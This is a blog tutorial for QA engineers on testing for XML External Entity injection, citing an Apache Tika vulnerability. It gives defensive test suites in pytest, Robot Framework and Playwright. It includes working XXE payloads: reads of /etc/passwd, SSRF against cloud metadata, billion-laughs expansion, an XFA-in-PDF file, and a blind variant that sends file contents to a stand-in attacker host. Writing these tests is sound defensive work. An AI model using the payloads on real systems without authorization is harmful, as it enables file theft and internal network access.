Your application receives an XML file. It looks like a normal invoice, a configuration payload, a SOAP request, or a PDF. Your parser opens it.
Inside the XML is a DOCTYPE declaration that defines an external entity pointing to /etc/passwd. The parser resolves the entity, reads the file, and inserts the content into the parsed document. Your application returns a response that includes the contents of /etc/passwd.
The attacker has your system file. You have a perfect 200 OK in your test suite.
TL;DR
- XXE lets an attacker embed a malicious XML entity inside a document or request your server parses. The parser fetches the entity, the attacker reads the result. No authentication required.
- CVE-2025-66516 in Apache Tika scored CVSS 10.0. A crafted PDF containing malicious XFA content triggered XXE in tika-core, exposing sensitive files and enabling SSRF. Over 565 vulnerable instances exposed at time of disclosure. Fixed in tika-core 3.2.2.
- Your test suite submits valid XML and asserts a correct response. It almost certainly never submits XML containing a DOCTYPE declaration with an external entity reference. That is the entire attack surface.
- Fix requires disabling external entity resolution in the XML parser configuration, not in input validation. Sanitizing the XML string is not sufficient and will be bypassed.
- AI tools generate tests that submit well-formed XML. They have no mechanism for generating malicious DOCTYPE payloads and no understanding of why those payloads matter.
What it is
XML External Entity injection (CWE-611) occurs when an application parses XML input that includes a DOCTYPE declaration defining an external entity reference, and the XML parser is configured to resolve those references.
An external entity tells the parser to fetch content from an external source: a file path, a URL, or a network resource. When the parser resolves the entity, it retrieves that content and substitutes it into the XML document. If the application returns any part of the parsed document in its response, the attacker receives the fetched content.
Developers introduce this because XML parsers in Java, Python, and most other languages enable external entity resolution by default as part of the XML specification. It is not a bug in the parser. It is a feature the parser exposes because the specification defines it and the developer never disabled it because they were focused on parsing valid XML, not on what happens when someone submits malicious XML.
What makes XXE particularly dangerous is the range of attack vectors that trigger it. Direct API requests containing XML are the obvious case, but XXE also appears in file upload endpoints that accept XML-based formats such as DOCX, XLSX, SVG, RSS, SOAP payloads, and PDF files containing XML Forms Architecture (XFA) content.
The attack can read arbitrary files the process has access to, perform SSRF by pointing the entity at internal network resources, and under certain parser configurations trigger denial of service via entity expansion attacks (the "billion laughs" variant).
Real world damage
CVE-2025-66516 · Apache Tika · December 2025 · CVSS 10.0 (Critical)
On December 4, 2025, the Apache Software Foundation disclosed a maximum-severity XXE vulnerability in Apache Tika — the widely used open-source content analysis toolkit that extracts text and metadata from over a thousand file types.
The vulnerability was triggered by submitting a PDF file containing a maliciously crafted XFA payload. When Tika parsed the PDF, the ore XML parser resolved the external entity references embedded in the XFA content without restriction, allowing an unauthenticated attacker to read sensitive files from the server's file system and perform SSRF by pointing entity references at internal network addresses.
Source: Apache Software Foundation security advisory and
NVD CVE-2025-66516 (nvd.nist.gov/vuln/detail/CVE-2025-66516).
Affected: tika-core 1.13 through 3.2.1. Fixed in tika-core 3.2.2.
The disclosure expanded the scope of a prior advisory, CVE-2025 54988 (CVSS 8.4), published in August 2025. Organizations that patched the tika-parser-pdf-module in response to the earlier advisory remained fully vulnerable because the actual fix required upgrading tika-core. This partial-patch scenario left hundreds of organizations exposed after believing they had remediated the issue. Censys observed 565 vulnerable instances exposed on the internet at time of disclosure.
A QA engineer running XXE payload tests against the document upload endpoint would have caught this. The test is not complex: submit a PDF containing a DOCTYPE declaration with an external entity reference and assert the server returns 400, or that the response body does not contain file system content. That test did not exist.
The invisible bug problem
Test suites for XML-processing endpoints submit well-formed, valid XML and assert correct parsing behavior. The schema is validated. The content is checked. The response is correct.
Nobody submits a DOCTYPE declaration, because nobody is writing tests from an attacker's perspective.
The XXE surface is invisible to a test suite that only generates input the feature was designed to accept. The attack requires input that is syntactically valid XML but semantically adversarial. Valid XML parsers accept DOCTYPE declarations. The feature works perfectly. The test passes.
The vulnerability is in the parser's willingness to resolve the entity and that behavior is never triggered by a test that submits a legitimate document.
How QA engineers catch it
The core principle: every endpoint that accepts XML input, regardless of format or file extension, must be tested with XXE payloads that attempt file system access, internal network access, and entity expansion. The assertion is not just that the response is incorrect — it is that the response does not contain file system content and that the parser did not make an outbound network request.
XXE payload reference
<!-- Basic file read — Linux -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>
<!-- Basic file read — Windows -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>
<!-- SSRF via entity — AWS metadata -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>
<!-- Billion laughs — denial of service via entity expansion -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>
<!-- Parameter entity variant — blind XXE -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
]>
<root><data>&exfil;</data></root>
PyTest
import pytest
import requests
BASE_URL = "https://your-app.com"
XXE_FILE_READ_LINUX = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>"""
XXE_FILE_READ_WINDOWS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>"""
XXE_SSRF = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>"""
XXE_BILLION_LAUGHS = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>"""
FILE_SYSTEM_MARKERS = [
"root:x:", "bin/bash", "bin/sh",
"[extensions]", "boot loader",
"ami-id", "instance-id", "security-credentials"
]
XXE_PAYLOADS = [
("file_read_linux", XXE_FILE_READ_LINUX, "application/xml"),
("file_read_windows", XXE_FILE_READ_WINDOWS, "application/xml"),
("ssrf_metadata", XXE_SSRF, "application/xml"),
("billion_laughs", XXE_BILLION_LAUGHS, "application/xml"),
]
@pytest.fixture
def auth_session():
session = requests.Session()
session.post(f"{BASE_URL}/login", json={
"username": "testuser",
"password": "test_password"
})
return session
@pytest.mark.parametrize("name,payload,content_type", XXE_PAYLOADS)
def test_xxe_payload_rejected(auth_session, name, payload, content_type):
# CVE-2025-66516 pattern: parser must not resolve external entities
response = auth_session.post(
f"{BASE_URL}/api/parse-xml",
data=payload,
headers={"Content-Type": content_type}
)
assert response.status_code in [400, 403, 422], (
f"XXE payload '{name}' not rejected — "
f"returned {response.status_code}"
)
@pytest.mark.parametrize("name,payload,content_type", XXE_PAYLOADS)
def test_xxe_no_file_system_content_in_response(auth_session, name, payload, content_type):
# even a rejected request must not echo file system content
response = auth_session.post(
f"{BASE_URL}/api/parse-xml",
data=payload,
headers={"Content-Type": content_type}
)
body = response.text
for marker in FILE_SYSTEM_MARKERS:
assert marker not in body, (
f"File system content '{marker}' found in response "
f"for XXE payload '{name}'"
)
def test_xxe_pdf_upload_with_xfa_payload(auth_session):
# CVE-2025-66516: XFA content inside PDF triggers XXE in tika-core
# construct a minimal PDF with embedded XXE in XFA stream
xxe_xfa = b"""%PDF-1.4
1 0 obj
<< /Type /Catalog /Pages 2 0 R /AcroForm << /XFA 3 0 R >> >>
endobj
2 0 obj
<< /Type /Pages /Kids [] /Count 0 >>
endobj
3 0 obj
<< /Length 200 >>
stream
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<data>&xxe;</data>
</xfa:data>
endstream
endobj
xref
0 4
0000000000 65535 f
trailer << /Size 4 /Root 1 0 R >>
startxref
0
%%EOF"""
response = auth_session.post(
f"{BASE_URL}/api/upload-document",
files={"file": ("test.pdf", xxe_xfa, "application/pdf")}
)
body = response.text
for marker in FILE_SYSTEM_MARKERS:
assert marker not in body, (
f"File system content '{marker}' found in PDF/XFA XXE response"
)
def test_valid_xml_still_parses_correctly(auth_session):
# confirm XXE protection does not break legitimate XML processing
valid_xml = """<?xml version="1.0" encoding="UTF-8"?>
<config>
<setting name="timeout">30</setting>
<setting name="retries">3</setting>
</config>"""
response = auth_session.post(
f"{BASE_URL}/api/parse-xml",
data=valid_xml,
headers={"Content-Type": "application/xml"}
)
assert response.status_code == 200
Robot Framework
*** Settings ***
Library RequestsLibrary
Library Collections
Library OperatingSystem
*** Variables ***
${BASE_URL} https://your-app.com
${XXE_FILE_READ}
... <?xml version="1.0" encoding="UTF-8"?>
... <!DOCTYPE foo [
... <!ENTITY xxe SYSTEM "file:///etc/passwd">
... ]>
... <root><data>&xxe;</data></root>
${XXE_SSRF}
... <?xml version="1.0" encoding="UTF-8"?>
... <!DOCTYPE foo [
... <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
... ]>
... <root><data>&xxe;</data></root>
${XXE_BILLION_LAUGHS}
... <?xml version="1.0" encoding="UTF-8"?>
... <!DOCTYPE lolz [
... <!ENTITY lol "lol">
... <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
... <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
... ]>
... <root><data>&lol3;</data></root>
@{FILE_SYSTEM_MARKERS}
... root:x: bin/bash bin/sh
... [extensions] ami-id instance-id
*** Test Cases ***
XXE File Read Payload Must Be Rejected
# CVE-2025-66516: external entity pointing to file system must not resolve
Create Session app ${BASE_URL}
${headers}= Create Dictionary Content-Type=application/xml
${response}= POST On Session app /api/parse-xml
... data=${XXE_FILE_READ} headers=${headers} expected_status=any
Should Be True ${response.status_code} in [400, 403, 422]
... msg=XXE file read payload not rejected
FOR ${marker} IN @{FILE_SYSTEM_MARKERS}
Should Not Contain ${response.text} ${marker}
... msg=File system content '${marker}' in XXE response
END
XXE SSRF Payload Must Be Rejected
Create Session app ${BASE_URL}
${headers}= Create Dictionary Content-Type=application/xml
${response}= POST On Session app /api/parse-xml
... data=${XXE_SSRF} headers=${headers} expected_status=any
Should Be True ${response.status_code} in [400, 403, 422]
... msg=XXE SSRF payload not rejected
FOR ${marker} IN @{FILE_SYSTEM_MARKERS}
Should Not Contain ${response.text} ${marker}
END
XXE Billion Laughs Must Not Cause Timeout
Create Session app ${BASE_URL}
${headers}= Create Dictionary Content-Type=application/xml
${response}= POST On Session app /api/parse-xml
... data=${XXE_BILLION_LAUGHS} headers=${headers}
... expected_status=any timeout=10
Should Be True ${response.status_code} in [400, 403, 422]
... msg=Billion laughs payload not rejected — possible DoS risk
Valid XML Still Parses Correctly
# confirm protection does not break legitimate XML processing
${valid_xml}= Set Variable
... <?xml version="1.0"?><config><setting>30</setting></config>
Create Session app ${BASE_URL}
${headers}= Create Dictionary Content-Type=application/xml
${response}= POST On Session app /api/parse-xml
... data=${valid_xml} headers=${headers}
Should Be Equal As Strings ${response.status_code} 200
TypeScript — Playwright API testing
import { test, expect, APIRequestContext } from '@playwright/test';
const XXE_PAYLOADS = {
fileReadLinux: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root><data>&xxe;</data></root>`,
fileReadWindows: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
]>
<root><data>&xxe;</data></root>`,
ssrfMetadata: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/">
]>
<root><data>&xxe;</data></root>`,
billionLaughs: `<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
]>
<root><data>&lol4;</data></root>`,
};
const FILE_SYSTEM_MARKERS = [
'root:x:', 'bin/bash', 'bin/sh',
'[extensions]', 'boot loader',
'ami-id', 'instance-id', 'security-credentials',
];
let apiContext: APIRequestContext;
test.beforeAll(async ({ playwright }) => {
apiContext = await playwright.request.newContext({
baseURL: 'https://your-app.com',
});
await apiContext.post('/login', {
data: { username: 'testuser', password: 'test_password' }
});
});
test.afterAll(async () => {
await apiContext.dispose();
});
for (const [name, payload] of Object.entries(XXE_PAYLOADS)) {
test(`XXE — ${name} payload rejected`, async () => {
// CVE-2025-66516: external entity resolution must be disabled
const response = await apiContext.post('/api/parse-xml', {
data: payload,
headers: { 'Content-Type': 'application/xml' },
});
expect(
[400, 403, 422],
`XXE payload '${name}' not rejected — returned ${response.status()}`
).toContain(response.status());
});
test(`XXE — ${name} produces no file system content`, async () => {
const response = await apiContext.post('/api/parse-xml', {
data: payload,
headers: { 'Content-Type': 'application/xml' },
});
const body = await response.text();
for (const marker of FILE_SYSTEM_MARKERS) {
expect(
body,
`File system content '${marker}' found in response for '${name}'`
).not.toContain(marker);
}
});
}
test('XXE — PDF with XFA payload does not expose file content', async () => {
// CVE-2025-66516 exact attack surface: XFA inside PDF triggers tika-core XXE
const xfaPayload = Buffer.from(`%PDF-1.4
1 0 obj << /Type /Catalog /AcroForm << /XFA 2 0 R >> >> endobj
2 0 obj << /Length 180 >> stream
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<xfa:data xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<d>&xxe;</d>
</xfa:data>
endstream endobj
trailer << /Root 1 0 R >> %%EOF`);
const response = await apiContext.post('/api/upload-document', {
multipart: {
file: {
name: 'test.pdf',
mimeType: 'application/pdf',
buffer: xfaPayload,
},
},
});
const body = await response.text();
for (const marker of FILE_SYSTEM_MARKERS) {
expect(
body,
`File system content '${marker}' found in PDF/XFA XXE response`
).not.toContain(marker);
}
});
test('XXE — billion laughs does not cause timeout', async () => {
// entity expansion attack — parser must reject before memory exhaustion
const response = await apiContext.post('/api/parse-xml', {
data: XXE_PAYLOADS.billionLaughs,
headers: { 'Content-Type': 'application/xml' },
timeout: 10000,
});
expect(
[400, 403, 422],
'Billion laughs payload not rejected — possible DoS risk'
).toContain(response.status());
});
test('XXE — valid XML still parses correctly', async () => {
// confirm protection does not break legitimate XML processing
const validXml = `<?xml version="1.0" encoding="UTF-8"?>
<config>
<setting name="timeout">30</setting>
<setting name="retries">3</setting>
</config>`;
const response = await apiContext.post('/api/parse-xml', {
data: validXml,
headers: { 'Content-Type': 'application/xml' },
});
expect(response.status()).toBe(200);
});
Run XXE tests in isolation:
npx playwright test --grep "XXE"
CI/CD gate
xxe-security-tests:
stage: test
script:
- pytest tests/security/test_xxe.py -v
- npx playwright test --grep "XXE"
rules:
- if: '$CI_PIPELINE_SOURCE == "merge_request_event"'
allow_failure: false
Pair with a Semgrep rule that flags XML parser instantiation without external entity disabling configuration applied. The static check catches new parser instantiations before deployment. The runtime tests confirm the configuration is actually in effect in the running application.
Environment note
XXE behavior changes between environments because file system content differs and because some server configurations restrict which files the process can read. In a Docker container running as a non-root user, the payload may resolve successfully but return empty content, which your test could incorrectly interpret as passing.
Assert on the absence of the error that would indicate resolution was blocked, not just on the absence of file content. Also test in your staging environment with the same XML parser versions your production Docker images contain. Parser versions within the same major version can have different default configurations depending on the distribution and build flags.
Practice this yourself: https://yuriysafron.com/qa-sandbox/xxe/
Why AI fails here
When a team asks GitHub Copilot to write tests for an XML processing endpoint, it generates tests that submit valid XML documents and assert that the parsed output is correct. The schema validates. The content is extracted. The response matches expectations.
Not one generated test contains a DOCTYPE declaration. Not one submits an entity reference.
The structural reason LLMs fail at XXE: the vulnerability is defined by a parser feature, not by application logic. To test for it, you need to know that XML parsers have external entity resolution, that this feature is enabled by default, that it is triggered by a DOCTYPE declaration in the input, and that the correct test submits that declaration and checks what the server does. This knowledge does not come from reading the application code. It comes from understanding the XML specification and the history of parser misconfigurations.
The concrete failure: a QA team builds an API that accepts XML configuration files for batch import. Copilot generates fifteen tests. Every test submits a valid configuration file. Every test passes. Three months later, a penetration tester submits a configuration file whose first line defines an external entity pointing to the application's environment file. The response body contains the database connection string. The Copilot suite had fifteen tests for the XML endpoint. None contained a DOCTYPE. The XXE surface had been there since day one.
How to prevent
1. Explicit external entity disabling in every parser instantiation — in Java, set the features http://xml.org/sax/features/external-general-entities and http://xml.org/sax/features/external-parameter-entities to false, and disable DOCTYPE declarations entirely with http://apache.org/xml/features/disallow-doctype-decl set to true. In Python, use defusedxml as a drop-in replacement for the standard library's xml module. Use a hardened shared parser factory so individual developers cannot instantiate a default parser without the configuration applied.
2. Parser version audit in your dependency pipeline — the Apache Tika CVE-2025-66516 case demonstrated that partial upgrades leave organizations vulnerable when the fix resides in a shared core module. Every dependency that processes XML-based formats, including libraries handling PDF, DOCX, XLSX, SVG, RSS, and SOAP, must be included in your dependency audit. Tools like GitHub Dependabot, Snyk, or OWASP Dependency-Check integrated into GitLab CI surface vulnerable transitive dependencies before they reach production.
3. Content-type and format enforcement before parsing — reject any request whose content does not match the expected format before passing it to the parser. This eliminates a large class of direct XML injection attacks where an attacker submits a raw XML payload to an endpoint that expects a binary format.
Prevention only works when your test suite actively verifies that external entity resolution is disabled under adversarial payloads. A parser configured correctly in code can have its configuration overridden by a library update, a framework default, or a developer who does not understand why the configuration exists. The XXE payload tests are the enforcement mechanism.
Conclusion
Working on a cybersecurity platform protecting U.S. critical infrastructure and multiple branches of the U.S. military gives you a direct view of what document parsing vulnerabilities mean at scale. In those environments, a file upload endpoint that processes XML is not a minor feature. It is a potential entry point into internal network infrastructure.
XXE sits in the category of vulnerabilities that are entirely invisible to functional test coverage and entirely obvious once you know what payload to submit.
The gap between "this endpoint parses XML correctly" and "this endpoint refuses to resolve external entities" is a single parser configuration line. The test suite is the only thing that tells you whether that line is there.
When did your team last verify that every XML parser in your codebase has external entity resolution explicitly disabled — and do you have a test that would catch a new parser instantiation that ships without that configuration?
Part of the Break It on Purpose series — published weekly for QA
engineers and SDETs who find bugs before attackers do.
Practice sandbox: yuriysafron.com/qa-sandbox
LinkedIn: linkedin.com/in/yuriysafronnynov
Top comments (0)